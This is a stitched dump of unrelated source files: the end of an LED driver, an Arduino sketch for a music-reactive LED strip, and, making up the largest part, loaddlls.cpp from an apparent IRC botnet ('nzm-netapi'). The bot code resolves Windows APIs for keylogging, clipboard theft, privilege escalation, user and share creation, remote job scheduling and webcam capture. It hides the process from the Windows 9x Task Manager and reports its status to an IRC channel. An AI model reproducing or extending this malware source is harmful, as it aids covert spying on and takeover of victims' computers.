QLO2(b2, 1) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b2, 0) D2(0) LO1 D3(0) #endif // DONE // D2(4) LO1 D3(0) } } // save the d values // d[0] = d0; // d[1] = d1; // d[2] = d2; } #ifdef SUPPORT_ARGB virtual void showARGB(struct CARGB *data, int nLeds) { // TODO: IMPLEMENTME } #endif }; #endif #endif
c1d226c276a756eb77cd613b52c572725eed91b4
91a0ce124d68c8f77a0d9b44a01b2b7295d9d0ab
/Class Projects/Custom Controlled LED Light Strips/lpd6803Spi/lpd6803Spi.ino
9e942276d029b79ba86c070b0f6127357a7dcebc
[]
no_license
DcVamps/Academic-Programming
aaacfae07ed50326edae24f3b0285fc9de83c779
911729950b65614f6a13b325f49249957c559948
refs/heads/master
2020-04-27T15:35:58.622623
2019-08-05T00:45:14
2019-08-05T00:45:14
174,452,447
0
0
null
null
null
null
UTF-8
C++
false
false
5,766
ino
#include <TimerOne.h> #include <SPI.h> #include "Neophob_LPD6803.h" /* Unlike software SPI which is configurable, hardware SPI works only on very specific pins. On the Arduino Uno, Duemilanove, etc., clock = pin 13 and data = pin 11. For the Arduino Mega, clock = pin 52, data = pin 51. For the ATmega32u4 Breakout Board and Teensy, clock = pin B1, data = B2. Alternately, on most boards you can use the 6-pin programming header for SPI output as well, in which case clock = pin 3 and data = pin 4. src: http://forums.adafruit.com/viewtopic.php?f=47&t=24256 thanks phil! */ #define LED_MODULES 50 Neophob_LPD6803 strip = Neophob_LPD6803(LED_MODULES); int analogPin1 = 1; int analogPin2 = 3; int leftVal = 0; int leftLevel; int rightVal = 0; int rightLevel; uint32_t RED; uint32_t GREEN; uint32_t BLUE; uint32_t CYAN; uint32_t MAGENTA; uint32_t YELLOW; uint32_t WHITE; uint32_t CLEAR; void setup() { RED = Color(0,0,31); GREEN = Color(31,0,0); BLUE = Color(0,31,0); CYAN = Color(31,31,0); YELLOW = Color(31,0,31); MAGENTA = Color(0,31,31); WHITE = Color(31,31,31); CLEAR = Color(0,0,0); //just play with those values! Serial.begin(9600); strip.setCPUmax(50); strip.begin(SPI_CLOCK_DIV64); strip.show(); } void loop() { //music analog read in leftVal = analogRead(analogPin1); rightVal = analogRead(analogPin2); leftLevel = leftVal/12; rightLevel = rightVal/12; switch(7) { case 4: equalizer(WHITE);delay(50); break; case 2: colorWipe(RED, 50);//g colorWipeRev(GREEN, 50);//b colorWipe(BLUE, 50);//r colorWipeRev(WHITE,50);//w break; case 3: strip.setPixelColor(45, CYAN); strip.setPixelColor(3, YELLOW); strip.show(); break; case 5: rainbowCycle(50); break; case 6: rainbow(5); break; case 7: colorWheel(50); break; } } void equalizer (uint8_t c) { int i; for(i=0;i<LED_MODULES;i++) { strip.setPixelColor(i,CLEAR); } for(i=0;i<leftLevel;i++) { strip.setPixelColor(i,c); } for(i=0;i<rightLevel;i++) { strip.setPixelColor(strip.numPixels()-1-i,c); } strip.show(); //delay(75); } // Slightly different, this one makes the rainbow wheel equally distributed // along the chain void rainbowCycle(uint8_t wait) { int i, j; for (j=0; j < 96 * 5; j++) { // 5 cycles of all 96 colors in the wheel for (i=0; i < strip.numPixels(); i++) { // tricky math! we use each pixel as a fraction of the full 96-color wheel // (thats the i / strip.numPixels() part) // Then add in j which makes the colors go around per pixel // the % 96 is to make the wheel cycle around strip.setPixelColor(i, Wheel( ((i * 96 / strip.numPixels()) + j) % 96) ); } strip.show(); // write all the pixels out delay(wait); } } void solidColor(uint32_t c) { int i; for (i=0; i < strip.numPixels(); i++) { strip.setPixelColor(i, c); } strip.show(); } // fill the dots one after the other with said color // good for testing purposes void colorWipe(uint32_t c, uint8_t wait) { int i; for (i=0; i < strip.numPixels(); i++) { strip.setPixelColor(i, c); strip.show(); delay(wait); } } void colorWipeRev(uint32_t c, uint8_t wait) { int i; for (i=strip.numPixels(); i > 0 ; i--) { strip.setPixelColor(i, c); strip.show(); delay(wait); } } void colorWheel(uint8_t wait) { int numpos = LED_MODULES/7; int i,j,pos; int color = 1; uint32_t nextColor; for(pos=0;pos<7;pos++) { for(i=0;i<numpos;i++) { color++; for(j=0;j<LED_MODULES;j++) { switch(j) { case 7: color++; break; case 14: color++; break; case 21: color++; break; case 28: color++; break; case 35: color++; break; case 42: color++; break; case 49: color++; break; } if(color>7) { color=1; } switch(color) { case 2: nextColor = RED; break; case 3: nextColor = YELLOW; break; case 4: nextColor = WHITE; break; case 5: nextColor = GREEN; break; case 6: nextColor = CYAN; break; case 7: nextColor = BLUE; break; case 1: nextColor = MAGENTA; break; } strip.setPixelColor(j,nextColor); strip.show(); delay(wait); } delay(wait); //delay(300); //strip.show(); } delay(wait); } //delay(wait); } void rainbow(uint8_t wait) { int i, j; for (j=0; j < 96 * 3; j++) { // 3 cycles of all 96 colors in the wheel for (i=0; i < strip.numPixels(); i++) { strip.setPixelColor(i, Wheel( (i + j) % 96)); } strip.show(); // write all the pixels out delay(wait); } } // Create a 15 bit color value from R,G,B unsigned int Color(byte r, byte g, byte b) { //Take the lowest 5 bits of each value and append them end to end return( ((unsigned int)g & 0x1F )<<10 | ((unsigned int)b & 0x1F)<<5 | (unsigned int)r & 0x1F); } //Input a value 0 to 127 to get a color value. //The colours are a transition r - g -b - back to r unsigned int Wheel(byte WheelPos) { byte r,g,b; switch(WheelPos >> 5) { case 0: r=31- WheelPos % 32; //Red down g=WheelPos % 32; // Green up b=0; //blue off break; case 1: g=31- WheelPos % 32; //green down b=WheelPos % 32; //blue up r=0; //red off break; case 2: b=31- WheelPos % 32; //blue down r=WheelPos % 32; //red up g=0; //green off break; } return(Color(r,g,b)); }
3fbdbde9018a5d80515e87ee2e0f8806b61787e0
d49b8536d996a81fd2a356f2ccd850abd4447217
/VirusPack/nzm-netapi/nzm-netapi/Test101-ms0640/cpp/core/loaddlls.cpp
cd2c26ff1f36e488ba8b12d9abb7017e413bfa99
[]
no_license
JonnyBanana/botnets
28a90ab80f973478d54579f3d3eadc5feb33ff77
995b9c20aca5de0ae585ae17780a31e8bdfd9844
refs/heads/master
2021-07-01T01:51:01.211451
2020-10-22T23:14:57
2020-10-22T23:14:57
148,392,362
9
5
null
null
null
null
WINDOWS-1252
C++
false
false
21,285
cpp
#include "../../headers/includes.h" // kernel32.dll function variables SEM fSetErrorMode; CT32S fCreateToolhelp32Snapshot; P32F fProcess32First; P32N fProcess32Next; M32F fModule32First; GDFSE fGetDiskFreeSpaceEx; GLDS fGetLogicalDriveStrings; GDT fGetDriveType; SP fSearchPath; QPC fQueryPerformanceCounter; QPF fQueryPerformanceFrequency; RSP fRegisterServiceProcess; // user32.dll function variables SM fSendMessage; FW fFindWindow; IW fIsWindow; DW fDestroyWindow; OC fOpenClipboard; GCD fGetClipboardData; CC fCloseClipboard; EWE fExitWindowsEx; #ifndef NO_KEYLOG GAKS fGetAsyncKeyState; GKS fGetKeyState; GWT fGetWindowText; GFW fGetForegroundWindow; #endif // advapi32.dll function variables ROKE fRegOpenKeyEx; RCKE fRegCreateKeyEx; RSVE fRegSetValueEx; RQVE fRegQueryValueEx; RDV fRegDeleteValue; RCK fRegCloseKey; #ifndef NO_PROCESS OPT fOpenProcessToken; LPV fLookupPrivilegeValue; ATP fAdjustTokenPrivileges; #endif #ifndef NO_NET OSCM fOpenSCManager; OS fOpenService; SS fStartService; CS fControlService; DS fDeleteService; CSH fCloseServiceHandle; ESS fEnumServicesStatus; IVSD fIsValidSecurityDescriptor; #endif #ifndef NO_SYSINFO GUN fGetUserName; #endif // gdi32.dll function variables CDC fCreateDC; CDIBS fCreateDIBSection; CCDC fCreateCompatibleDC; GDC fGetDeviceCaps; GDIBCT fGetDIBColorTable; SO fSelectObject; BB fBitBlt; DDC fDeleteDC; DO fDeleteObject; // ws2_32.dll function variables WSAS fWSAStartup; WSASo fWSASocket; WSAAS fWSAAsyncSelect; WSAFDIS __fWSAFDIsSet; WSAI fWSAIoctl; WSAGLE fWSAGetLastError; WSAC fWSACleanup; SOCK fsocket; IOCTLS fioctlsocket; CON fconnect; INTOA finet_ntoa; IADDR finet_addr; HTONS fhtons; HTONL fhtonl; NTOHS fntohs; NTOHL fntohl; SEND fsend; SENDTO fsendto; RECV frecv; RECVFROM frecvfrom; BIND fbind; SEL fselect; LIS flisten; ACC faccept; SSO fsetsockopt; GSN fgetsockname; GHN fgethostname; GHBN fgethostbyname; GHBA fgethostbyaddr; GPN fgetpeername; CLSO fclosesocket; // wininet.dll function variables IGCS fInternetGetConnectedState; IGCSE fInternetGetConnectedStateEx; HOR fHttpOpenRequest; HSR fHttpSendRequest; IC fInternetConnect; IO fInternetOpen; IOU fInternetOpenUrl; ICU fInternetCrackUrl; IRF fInternetReadFile; ICH fInternetCloseHandle; HANDLE ih; // icmp.dll function variables #ifndef NO_PING ICF fIcmpCreateFile; ISE fIcmpSendEcho; ICH fIcmpCloseHandle; #endif // netapi32.dll function variables NSA fNetShareAdd; NSD fNetShareDel; NSE fNetShareEnum; NSJA fNetScheduleJobAdd; NABF fNetApiBufferFree; NRTOD fNetRemoteTOD; NUA fNetUserAdd; NUD fNetUserDel; NUE fNetUserEnum; NUGI fNetUserGetInfo; NMBS fNetMessageBufferSend; // dnsapi.dll function variables DFRC fDnsFlushResolverCache; DFRCEA fDnsFlushResolverCacheEntry_A; // iphlpapi.dll function variables GINT fGetIpNetTable; DINE fDeleteIpNetEntry; // mpr.dll function variables WNAC2 fWNetAddConnection2; WNAC2W fWNetAddConnection2W; WNCC2 fWNetCancelConnection2; WNCC2W fWNetCancelConnection2W; // shell32.dll function variables SE fShellExecute; SHCN fSHChangeNotify; // odbc32.dll function variables SQLDC fSQLDriverConnect; SQLSEA fSQLSetEnvAttr; SQLED fSQLExecDirect; SQLAH fSQLAllocHandle; SQLFH fSQLFreeHandle; SQLD fSQLDisconnect; #ifndef NO_CAPTURE // avicap32.dll function variables cCCW fcapCreateCaptureWindow; cGDD fcapGetDriverDescription; #endif // globals for dynamic libraries BOOL nokernel32 = FALSE; DWORD nokernel32err = 0; BOOL nouser32 = FALSE; DWORD nouser32err = 0; BOOL noadvapi32 = FALSE; DWORD noadvapi32err = 0; BOOL nogdi32 = FALSE; DWORD nogdi32err = 0; BOOL nows2_32 = FALSE; DWORD nows2_32err = 0; BOOL nowininet = FALSE; DWORD nowinineterr = 0; BOOL noicmp = FALSE; DWORD noicmperr = 0; BOOL nonetapi32 = FALSE; DWORD nonetapi32err = 0; BOOL nodnsapi = FALSE; DWORD nodnsapierr = 0; BOOL noiphlpapi = FALSE; DWORD noiphlpapierr = 0; BOOL nompr = FALSE; DWORD nomprerr = 0; BOOL noshell32 = FALSE; DWORD noshell32err = 0; BOOL noodbc32 = FALSE; DWORD noodbc32err = 0; BOOL noavicap32 = FALSE; DWORD noavicap32err = 0; BOOL LoadDLLs(void) { // dynamically load kernel32.dll HMODULE kernel32_dll = GetModuleHandle("kernel32.dll"); if (kernel32_dll) { fSetErrorMode = (SEM)GetProcAddress(kernel32_dll, "SetErrorMode"); fCreateToolhelp32Snapshot = (CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot"); fProcess32First = (P32F)GetProcAddress(kernel32_dll, "Process32First"); fProcess32Next = (P32N)GetProcAddress(kernel32_dll, "Process32Next"); fModule32First = (M32F)GetProcAddress(kernel32_dll, "Module32First"); fGetDiskFreeSpaceEx = (GDFSE)GetProcAddress(kernel32_dll, "GetDiskFreeSpaceExA"); fGetLogicalDriveStrings = (GLDS)GetProcAddress(kernel32_dll, "GetLogicalDriveStringsA"); fGetDriveType = (GDT)GetProcAddress(kernel32_dll, "GetDriveTypeA"); fSearchPath = (SP)GetProcAddress(kernel32_dll, "SearchPathA"); fQueryPerformanceCounter = (QPC)GetProcAddress(kernel32_dll, "QueryPerformanceCounter"); fQueryPerformanceFrequency = (QPF)GetProcAddress(kernel32_dll, "QueryPerformanceFrequency"); if (!fSetErrorMode || !fCreateToolhelp32Snapshot || !fProcess32First || !fProcess32Next || !fGetDiskFreeSpaceEx || !fGetLogicalDriveStrings || !fGetDriveType || !fSearchPath || !fQueryPerformanceCounter || !fQueryPerformanceFrequency) nokernel32 = TRUE; fRegisterServiceProcess = (RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess"); // hide from the Windows 9x Task Manager if (fRegisterServiceProcess) fRegisterServiceProcess(0, 1); } else { nokernel32err = GetLastError(); nokernel32 = TRUE; } // dynamically load user32.dll HMODULE user32_dll = LoadLibrary("user32.dll"); if (user32_dll) { fSendMessage = (SM)GetProcAddress(user32_dll,"SendMessageA"); fFindWindow = (FW)GetProcAddress(user32_dll,"FindWindowA"); fIsWindow = (IW)GetProcAddress(user32_dll,"IsWindow"); fDestroyWindow = (DW)GetProcAddress(user32_dll,"DestroyWindow"); fOpenClipboard = (OC)GetProcAddress(user32_dll,"OpenClipboard"); fGetClipboardData = (GCD)GetProcAddress(user32_dll,"GetClipboardData"); fCloseClipboard = (CC)GetProcAddress(user32_dll,"CloseClipboard"); fExitWindowsEx = (EWE)GetProcAddress(user32_dll,"ExitWindowsEx"); if (!fSendMessage || !fFindWindow || !fIsWindow || !fDestroyWindow || !fOpenClipboard || !fGetClipboardData || !fCloseClipboard || !fExitWindowsEx) nouser32 = TRUE; #ifndef NO_KEYLOG fGetAsyncKeyState = (GAKS)GetProcAddress(user32_dll,"GetAsyncKeyState"); fGetKeyState = (GKS)GetProcAddress(user32_dll,"GetKeyState"); fGetWindowText = (GWT)GetProcAddress(user32_dll,"GetWindowTextA"); fGetForegroundWindow = (GFW)GetProcAddress(user32_dll,"GetForegroundWindow"); if (!fGetAsyncKeyState || !fGetKeyState || !fGetWindowText || !fGetForegroundWindow) nouser32 = TRUE; #endif } else { nouser32err = GetLastError(); nouser32 = TRUE; } // dynamically load advapi32.dll HMODULE advapi32_dll = GetModuleHandle("advapi32.dll"); if (advapi32_dll) { fRegOpenKeyEx = (ROKE)GetProcAddress(advapi32_dll,"RegOpenKeyExA"); fRegCreateKeyEx = (RCKE)GetProcAddress(advapi32_dll,"RegCreateKeyExA"); fRegSetValueEx = (RSVE)GetProcAddress(advapi32_dll,"RegSetValueExA"); fRegQueryValueEx = (RQVE)GetProcAddress(advapi32_dll,"RegQueryValueExA"); fRegDeleteValue = (RDV)GetProcAddress(advapi32_dll,"RegDeleteValueA"); fRegCloseKey = (RCK)GetProcAddress(advapi32_dll,"RegCloseKey"); if (!fRegOpenKeyEx || !fRegCreateKeyEx || !fRegSetValueEx || !fRegQueryValueEx || !fRegDeleteValue || !fRegCloseKey) noadvapi32 = TRUE; #ifndef NO_PROCESS fOpenProcessToken = (OPT)GetProcAddress(advapi32_dll,"OpenProcessToken"); fLookupPrivilegeValue = (LPV)GetProcAddress(advapi32_dll,"LookupPrivilegeValueA"); fAdjustTokenPrivileges = (ATP)GetProcAddress(advapi32_dll,"AdjustTokenPrivileges"); if (!fOpenProcessToken || !fLookupPrivilegeValue || !fAdjustTokenPrivileges) noadvapi32 = TRUE; #endif #ifndef NO_NET fOpenSCManager = (OSCM)GetProcAddress(advapi32_dll,"OpenSCManagerA"); fOpenService = (OS)GetProcAddress(advapi32_dll,"OpenServiceA"); fStartService = (SS)GetProcAddress(advapi32_dll,"StartServiceA"); fControlService = (CS)GetProcAddress(advapi32_dll,"ControlService"); fDeleteService = (DS)GetProcAddress(advapi32_dll,"DeleteService"); fCloseServiceHandle = (CSH)GetProcAddress(advapi32_dll,"CloseServiceHandle"); fEnumServicesStatus = (ESS)GetProcAddress(advapi32_dll,"EnumServicesStatusA"); fIsValidSecurityDescriptor = (IVSD)GetProcAddress(advapi32_dll,"IsValidSecurityDescriptor"); if (!fOpenSCManager || !fOpenService || !fStartService || !fControlService || !fDeleteService || !fCloseServiceHandle || !fEnumServicesStatus || !fIsValidSecurityDescriptor) noadvapi32 = TRUE; #endif #ifndef NO_SYSINFO fGetUserName = (GUN)GetProcAddress(advapi32_dll,"GetUserNameA"); if (!fGetUserName) noadvapi32 = TRUE; #endif } else { noadvapi32err = GetLastError(); noadvapi32 = TRUE; } // dynamically load gdi32.dll HMODULE gdi32_dll = GetModuleHandle("gdi32.dll"); if (gdi32_dll) { fCreateDC = (CDC)GetProcAddress(gdi32_dll,"CreateDCA"); fCreateDIBSection = (CDIBS)GetProcAddress(gdi32_dll,"CreateDIBSection"); fCreateCompatibleDC = (CCDC)GetProcAddress(gdi32_dll,"CreateCompatibleDC"); fGetDeviceCaps = (GDC)GetProcAddress(gdi32_dll,"GetDeviceCaps"); fGetDIBColorTable = (GDIBCT)GetProcAddress(gdi32_dll,"GetDIBColorTable"); fSelectObject = (SO)GetProcAddress(gdi32_dll,"SelectObject"); fBitBlt = (BB)GetProcAddress(gdi32_dll,"BitBlt"); fDeleteDC = (DDC)GetProcAddress(gdi32_dll,"DeleteDC"); fDeleteObject = (DO)GetProcAddress(gdi32_dll,"DeleteObject"); if (!fCreateDC || !fCreateDIBSection || !fCreateCompatibleDC || !fGetDeviceCaps || !fGetDIBColorTable || !fSelectObject || !fBitBlt || !fDeleteDC || !fDeleteObject) nogdi32 = TRUE; } else { nogdi32err = GetLastError(); nogdi32 = TRUE; } // dynamically load ws2_32.dll HMODULE ws2_32_dll = LoadLibrary("ws2_32.dll"); if (ws2_32_dll) { fWSAStartup = (WSAS)GetProcAddress(ws2_32_dll,"WSAStartup"); fWSASocket = (WSASo)GetProcAddress(ws2_32_dll,"WSASocketA"); fWSAAsyncSelect = (WSAAS)GetProcAddress(ws2_32_dll,"WSAAsyncSelect"); __fWSAFDIsSet = (WSAFDIS)GetProcAddress(ws2_32_dll,"__WSAFDIsSet"); fWSAIoctl = (WSAI)GetProcAddress(ws2_32_dll,"WSAIoctl"); fWSAGetLastError = (WSAGLE)GetProcAddress(ws2_32_dll,"WSAGetLastError"); fWSACleanup = (WSAC)GetProcAddress(ws2_32_dll,"WSACleanup"); fsocket = (SOCK)GetProcAddress(ws2_32_dll,"socket"); fioctlsocket = (IOCTLS)GetProcAddress(ws2_32_dll,"ioctlsocket"); fconnect = (CON)GetProcAddress(ws2_32_dll,"connect"); finet_ntoa = (INTOA)GetProcAddress(ws2_32_dll,"inet_ntoa"); finet_addr = (IADDR)GetProcAddress(ws2_32_dll,"inet_addr"); fhtons = (HTONS)GetProcAddress(ws2_32_dll,"htons"); fhtonl = (HTONL)GetProcAddress(ws2_32_dll,"htonl"); fntohs = (NTOHS)GetProcAddress(ws2_32_dll,"ntohs"); fntohl = (NTOHL)GetProcAddress(ws2_32_dll,"ntohl"); fsend = (SEND)GetProcAddress(ws2_32_dll,"send"); fsendto = (SENDTO)GetProcAddress(ws2_32_dll,"sendto"); frecv = (RECV)GetProcAddress(ws2_32_dll,"recv"); frecvfrom = (RECVFROM)GetProcAddress(ws2_32_dll,"recvfrom"); fbind = (BIND)GetProcAddress(ws2_32_dll,"bind"); fselect = (SEL)GetProcAddress(ws2_32_dll,"select"); flisten = (LIS)GetProcAddress(ws2_32_dll,"listen"); faccept = (ACC)GetProcAddress(ws2_32_dll,"accept"); fsetsockopt = (SSO)GetProcAddress(ws2_32_dll,"setsockopt"); fgetsockname = (GSN)GetProcAddress(ws2_32_dll,"getsockname"); fgethostname = (GHN)GetProcAddress(ws2_32_dll,"gethostname"); fgethostbyname = (GHBN)GetProcAddress(ws2_32_dll,"gethostbyname"); fgethostbyaddr = (GHBA)GetProcAddress(ws2_32_dll,"gethostbyaddr"); fgetpeername = (GPN)GetProcAddress(ws2_32_dll,"getpeername"); fclosesocket = (CLSO)GetProcAddress(ws2_32_dll,"closesocket"); if (!fWSAStartup || !fWSASocket || !fWSAAsyncSelect || !fWSAIoctl || !fWSAGetLastError || !fWSACleanup || !fsocket || !fioctlsocket || !fconnect || !finet_ntoa || !finet_addr || !fhtons || !fhtonl || !fntohs || !fsend || !fsendto || !frecv || !frecvfrom || !fbind || !fselect || !flisten || !faccept || !fsetsockopt || !fgetsockname || !fgethostname || !fgethostbyname || !fgethostbyaddr || !fclosesocket) nows2_32 = TRUE; } else { nows2_32err = GetLastError(); nows2_32 = TRUE; } // dynamically load wininet.dll HMODULE wininet_dll = LoadLibrary("wininet.dll"); if (wininet_dll) { fInternetGetConnectedState = (IGCS)GetProcAddress(wininet_dll, "InternetGetConnectedState"); fInternetGetConnectedStateEx = (IGCSE)GetProcAddress(wininet_dll, "InternetGetConnectedStateEx"); fHttpOpenRequest = (HOR)GetProcAddress(wininet_dll, "HttpOpenRequestA"); fHttpSendRequest = (HSR)GetProcAddress(wininet_dll, "HttpSendRequestA"); fInternetConnect = (IC)GetProcAddress(wininet_dll, "InternetConnectA"); fInternetOpen = (IO)GetProcAddress(wininet_dll, "InternetOpenA"); fInternetOpenUrl = (IOU)GetProcAddress(wininet_dll, "InternetOpenUrlA"); fInternetCrackUrl = (ICU)GetProcAddress(wininet_dll, "InternetCrackUrlA"); fInternetReadFile = (IRF)GetProcAddress(wininet_dll, "InternetReadFile"); fInternetCloseHandle = (ICH)GetProcAddress(wininet_dll, "InternetCloseHandle"); if (!fInternetGetConnectedState || !fInternetGetConnectedStateEx || !fHttpOpenRequest || !fHttpSendRequest || !fInternetConnect || !fInternetOpen || !fInternetOpenUrl || !fInternetCrackUrl || !fInternetReadFile || !fInternetCloseHandle) nowininet = TRUE; if (fInternetOpen) { ih = fInternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (ih == NULL) ih = 0; } } else { nowinineterr = GetLastError(); nowininet = TRUE; ih = 0; } #ifndef NO_PING // dynamically load icmp.dll HMODULE icmp_dll = LoadLibrary("icmp.dll"); if (icmp_dll) { fIcmpCreateFile = (ICF)GetProcAddress(icmp_dll,"IcmpCreateFile"); fIcmpCloseHandle = (ICH)GetProcAddress(icmp_dll,"IcmpCloseHandle"); fIcmpSendEcho = (ISE)GetProcAddress(icmp_dll,"IcmpSendEcho"); if (!fIcmpCreateFile || !fIcmpCloseHandle || !fIcmpSendEcho) noicmp = TRUE; } else { noicmperr = GetLastError(); noicmp = TRUE; } #endif // dynamically load netapi32.dll HMODULE netapi32_dll = LoadLibrary("netapi32.dll"); if (netapi32_dll) { fNetShareAdd = (NSA)GetProcAddress(netapi32_dll,"NetShareAdd"); fNetShareDel = (NSD)GetProcAddress(netapi32_dll,"NetShareDel"); fNetShareEnum = (NSE)GetProcAddress(netapi32_dll,"NetShareEnum"); fNetScheduleJobAdd = (NSJA)GetProcAddress(netapi32_dll,"NetScheduleJobAdd"); fNetApiBufferFree = (NABF)GetProcAddress(netapi32_dll,"NetApiBufferFree"); fNetRemoteTOD = (NRTOD)GetProcAddress(netapi32_dll,"NetRemoteTOD"); fNetUserAdd = (NUA)GetProcAddress(netapi32_dll,"NetUserAdd"); fNetUserDel = (NUD)GetProcAddress(netapi32_dll,"NetUserDel"); fNetUserEnum = (NUE)GetProcAddress(netapi32_dll,"NetUserEnum"); fNetUserGetInfo = (NUGI)GetProcAddress(netapi32_dll,"NetUserGetInfo"); fNetMessageBufferSend = (NMBS)GetProcAddress(netapi32_dll,"NetMessageBufferSend"); if (!fNetShareAdd || !fNetShareDel || !fNetShareEnum || !fNetScheduleJobAdd || !fNetApiBufferFree || !fNetRemoteTOD || !fNetUserAdd || !fNetUserDel || !fNetUserEnum || !fNetUserGetInfo || !fNetMessageBufferSend) nonetapi32 = TRUE; } else { nonetapi32err = GetLastError(); nonetapi32 = TRUE; } // dynamically load dnsapi.dll HMODULE dnsapi_dll = LoadLibrary("dnsapi.dll"); if (dnsapi_dll) { fDnsFlushResolverCache = (DFRC)GetProcAddress(dnsapi_dll,"DnsFlushResolverCache"); fDnsFlushResolverCacheEntry_A = (DFRCEA)GetProcAddress(dnsapi_dll,"DnsFlushResolverCacheEntry_A"); if (!fDnsFlushResolverCache || !fDnsFlushResolverCacheEntry_A) nodnsapi = TRUE; } else { nodnsapierr = GetLastError(); nodnsapi = TRUE; } // dynamically load iphlpapi.dll HMODULE iphlpapi_dll = LoadLibrary("iphlpapi.dll"); if (iphlpapi_dll) { fGetIpNetTable = (GINT)GetProcAddress(iphlpapi_dll,"GetIpNetTable"); fDeleteIpNetEntry = (DINE)GetProcAddress(iphlpapi_dll,"DeleteIpNetEntry"); if (!fGetIpNetTable || !fDeleteIpNetEntry) noiphlpapi = TRUE; } else { noiphlpapierr = GetLastError(); noiphlpapi = TRUE; } // dynamically load mpr.dll HMODULE mpr_dll = LoadLibrary("mpr.dll"); if (mpr_dll) { fWNetAddConnection2 = (WNAC2)GetProcAddress(mpr_dll,"WNetAddConnection2A"); fWNetAddConnection2W = (WNAC2W)GetProcAddress(mpr_dll,"WNetAddConnection2W"); fWNetCancelConnection2 = (WNCC2)GetProcAddress(mpr_dll,"WNetCancelConnection2A"); fWNetCancelConnection2W = (WNCC2W)GetProcAddress(mpr_dll,"WNetCancelConnection2W"); if (!fWNetAddConnection2 || !fWNetAddConnection2W || !fWNetCancelConnection2 || !fWNetCancelConnection2W) nompr = TRUE; } else { nomprerr = GetLastError(); nompr = TRUE; } // dynamically load shell32.dll HMODULE shell32_dll = LoadLibrary("shell32.dll"); if (shell32_dll) { fShellExecute = (SE)GetProcAddress(shell32_dll,"ShellExecuteA"); fSHChangeNotify = (SHCN)GetProcAddress(shell32_dll,"SHChangeNotify"); if (!fShellExecute || !fSHChangeNotify) noshell32 = TRUE; } else { noshell32err = GetLastError(); noshell32 = TRUE; } // dynamically load odbc32.dll HMODULE odbc32_dll = LoadLibrary("odbc32.dll"); if (odbc32_dll) { fSQLDriverConnect = (SQLDC)GetProcAddress(odbc32_dll,"SQLDriverConnect"); fSQLSetEnvAttr = (SQLSEA)GetProcAddress(odbc32_dll,"SQLSetEnvAttr"); fSQLExecDirect = (SQLED)GetProcAddress(odbc32_dll,"SQLExecDirect"); fSQLAllocHandle = (SQLAH)GetProcAddress(odbc32_dll,"SQLAllocHandle"); fSQLFreeHandle = (SQLFH)GetProcAddress(odbc32_dll,"SQLFreeHandle"); fSQLDisconnect = (SQLD)GetProcAddress(odbc32_dll,"SQLDisconnect"); if (!fSQLDriverConnect || !fSQLSetEnvAttr || !fSQLExecDirect || !fSQLAllocHandle || !fSQLFreeHandle || !fSQLDisconnect) noodbc32 = TRUE; } else { noodbc32err = GetLastError(); noodbc32 = TRUE; } #ifndef NO_CAPTURE // dynamically load avicap32.dll HMODULE avicap32_dll = LoadLibrary("avicap32.dll"); if (avicap32_dll) { fcapCreateCaptureWindow = (cCCW)GetProcAddress(avicap32_dll,"capCreateCaptureWindowA"); fcapGetDriverDescription = (cGDD)GetProcAddress(avicap32_dll,"capGetDriverDescriptionA"); if (!fcapCreateCaptureWindow || !fcapGetDriverDescription) noavicap32 = TRUE; } else { noavicap32err = GetLastError(); noavicap32 = TRUE; } #endif return TRUE; } void CheckDLLs(SOCKET sock, char *chan, BOOL notice, BOOL silent) { char sendbuf[IRCLINE]; if (nokernel32) { sprintf(sendbuf,"Kernel32.dll failed. <%d>", nokernel32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nouser32) { sprintf(sendbuf,"User32.dll failed. <%d>", nouser32err); irc_privmsg(sock, chan, sendbuf, notice); } if (noadvapi32) { sprintf(sendbuf,"Advapi32.dll failed. <%d>", noadvapi32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nogdi32) { sprintf(sendbuf,"Gdi32.dll failed. <%d>", nogdi32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nows2_32) { sprintf(sendbuf,"Ws2_32.dll failed. <%d>", nows2_32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nowininet) { sprintf(sendbuf,"Wininet.dll failed. <%d>", nowinineterr); irc_privmsg(sock, chan, sendbuf, notice); } if (noicmp) { sprintf(sendbuf,"Icmp.dll failed. <%d>", noicmperr); irc_privmsg(sock, chan, sendbuf, notice); } if (nonetapi32) { sprintf(sendbuf,"Netapi32.dll failed. <%d>", nonetapi32err); irc_privmsg(sock, chan, sendbuf, notice); } if (nodnsapi) { sprintf(sendbuf,"Dnsapi.dll failed. <%d>", nodnsapierr); irc_privmsg(sock, chan, sendbuf, notice); } if (noiphlpapi) { sprintf(sendbuf,"Iphlpapi.dll failed. <%d>", noiphlpapierr); irc_privmsg(sock, chan, sendbuf, notice); } if (nompr) { sprintf(sendbuf,"Mpr32.dll failed. <%d>", nomprerr); irc_privmsg(sock, chan, sendbuf, notice); } if (noshell32) { sprintf(sendbuf,"Shell32.dll failed. <%d>", noshell32err); irc_privmsg(sock, chan, sendbuf, notice); } if (noodbc32) { sprintf(sendbuf,"Odbc32.dll failed. <%d>", noodbc32err); irc_privmsg(sock, chan, sendbuf, notice); } #ifndef NO_CAPTURE if (noavicap32) { sprintf(sendbuf,"Avicap32.dll failed. <%d>", noavicap32err); irc_privmsg(sock, chan, sendbuf, notice); } #endif sprintf(sendbuf,"s[I] (core.plg) »» DLL test complete."); if (!silent) irc_privmsg(sock, chan, sendbuf, notice); addlog(sendbuf); return; }
ba6080bad3fb877f17b3213b2a5b0954fdcf036d
91934b8ad2f42f29c445d511c6dd273b7e35ed86
/juce/src/gui/components/mouse/juce_MouseHoverDetector.cpp
7c6748fad372025952de8b491b1fac4bccf4eaf8
[]
no_license
fubyo/osccalibrator
882d348ecf738a11f9bfddf3511693a69d6c1d9e
9c3652957c2ddc3d2a550f80be1cdb5e6707b8ce
refs/heads/master
2021-01-10T21:04:00.712697
2015-03-16T12:45:03
2015-03-16T12:45:03
32,316,417
0
0
null
null
null
null
UTF-8
C++
false
false
3,973
cpp
